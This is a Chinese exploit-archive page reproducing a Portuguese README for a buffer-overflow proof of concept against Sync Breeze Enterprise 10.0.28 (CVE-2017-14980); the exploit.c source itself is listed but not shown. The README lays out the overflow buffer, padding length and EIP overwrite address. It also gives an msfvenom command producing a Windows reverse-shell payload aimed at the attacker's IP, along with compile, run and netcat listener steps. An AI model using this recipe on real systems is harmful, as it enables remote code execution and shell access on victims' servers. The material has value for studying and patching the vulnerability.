关联漏洞
介绍
# Exploit - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28
Este repositório contém um exploit de **buffer overflow (BOF)** para a aplicação **Sync Breeze Enterprise** na versão **10.0.28**, explorando a vulnerabilidade identificada como **CVE-2017-14980**.
## 📌 Descrição
A vulnerabilidade ocorre devido à ausência de validação adequada no processamento do campo `password` durante uma requisição `POST` para o endpoint `/login`. Um atacante pode enviar um valor excessivamente longo neste campo e sobrescrever o **EIP**, permitindo a execução arbitrária de código.
Este exploit envia um payload cuidadosamente construído com:
- 520 bytes de preenchimento (`'A'`)
- 4 bytes para sobrescrever o EIP
- Um **NOP sled** de 20 bytes
- Um **shellcode Windows x86** que pode ser ajustado para execução de comandos arbitrários
## ⚙️ Como funciona
1. Constrói o buffer malicioso com o shellcode embutido.
2. Envia uma requisição HTTP `POST` para o servidor com o payload no campo `password`.
3. Ao processar a requisição, o aplicativo vulnerável sobrescreve o ponteiro de instrução (EIP) e executa o shellcode.
## 🛠️ Requisitos
- Compilador C (ex: `gcc`)
- Acesso à rede com o alvo rodando Sync Breeze Enterprise 10.0.28
- Ajuste do endereço de EIP (`\x83\x0C\x09\x10`) e shellcode, se necessário
- msfvenom -p windows/shell_reverse_tcp LHOST=<SEU_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
## 🧪 Execução
```bash
gcc exploit.c -o exploit
./exploit
```
Em outro terminal:
```bash
nc -nlvp 4444
文件快照
[4.0K] /data/pocs/b7092e9c343ea902628115f6413cbde0a39785d3
├── [4.1K] exploit.c
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。